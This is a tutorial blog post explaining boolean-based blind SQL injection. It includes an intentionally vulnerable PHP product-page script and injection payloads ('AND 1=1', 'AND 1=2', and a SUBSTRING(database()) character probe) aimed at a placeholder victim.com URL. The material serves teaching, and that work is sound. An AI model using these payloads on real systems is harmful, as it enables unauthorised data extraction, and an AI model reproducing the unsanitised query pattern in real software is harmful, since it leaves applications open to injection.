Thilan Dissanayaka Web App Hacking Apr 26

Boolean based Blind SQL Injection

Blind SQL Injection happens when:

There is a SQL injection vulnerability,

BUT the application does not show any SQL errors or query outputs directly.

In this case, an attacker has to ask questions to the database and observe how the server behaves to extract information bit by bit.

There are two main types:

Boolean-based blind SQLi (based on true/false responses)

Time-based blind SQLi (based on delay in server response)

Real-World Example Setup Imagine a product page with a URL like:

bash Copy Edit http://victim.com/product.php?id=5 and the vulnerable backend PHP code:

php Copy Edit <?php $id = $_GET['id']; $query = "SELECT * FROM products WHERE id = '$id'"; $result = mysqli_query($conn, $query); if (mysqli_num_rows($result) > 0) { // Display the product details $row = mysqli_fetch_assoc($result); echo "Product Name: " . $row['name']; } else { echo "No product found."; } ?> Problems:

No sanitization

User input directly used in SQL query

BUT importantly:

The page only says "Product found" or "No product found"

It does NOT show any SQL error messages or database outputs!

Boolean-Based Blind SQL Injection Basic Attack Idea: Inject a condition that changes the page behavior depending on TRUE or FALSE.

Example payload:

bash Copy Edit http://victim.com/product.php?id=5' AND 1=1 -- 1=1 is TRUE.

So the product page loads normally.

Payload to test FALSE:

bash Copy Edit http://victim.com/product.php?id=5' AND 1=2 -- 1=2 is FALSE.

The page now says "No product found".

Extracting Data Step by Step We can guess characters one by one.

Example: Try to extract the first letter of the database name:

sql Copy Edit ' AND SUBSTRING(database(),1,1)='a' -- URL encoded:

bash Copy Edit http://victim.com/product.php?id=5'%20AND%20SUBSTRING(database(),1,1)='a'%20--+ If the first letter is 'a', page shows "Product found".

Otherwise, "No product found".

We can automate this with a tool like SQLMap, or manually brute-force character by character.

ALSO READ
Common Web Application Attacks
May 17 Web App Hacking

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these....

REST API - Interview preparation guide
May 08 Interview Guides

## What is a REST API? A REST (Representational State Transfer) API is an architectural style for designing networked applications. It uses standard HTTP methods to interact with resources, making....

Build A Simple Web shell
Mar 23 Web App Hacking

A web shell is a type of code that hackers use to gain control over a web server. It is particularly useful for post-exploitation attacks, and there are various types of web shells available. Some of....

How does SLL work?
May 17 Cryptography

Have you ever noticed the small padlock icon in your browser's address bar? That tiny symbol represents a powerful security technology called SSL that protects millions of online transactions every....

Common Web Application Technologies
Feb 11 Web App Hacking

# JWT - JSON Web Tokens JWT is short for JSON Web Token. It is a compact and secure way to send information between two parties – like a client (browser) and a server. We usually use JWTs....

How stack works in function call
Mar 23 Web App Hacking

## The Stack in Computer Science The stack is an important concept in computer science. If you are planning to learn reverse engineering, malware analyzing, exploitation, etc., this concept is a....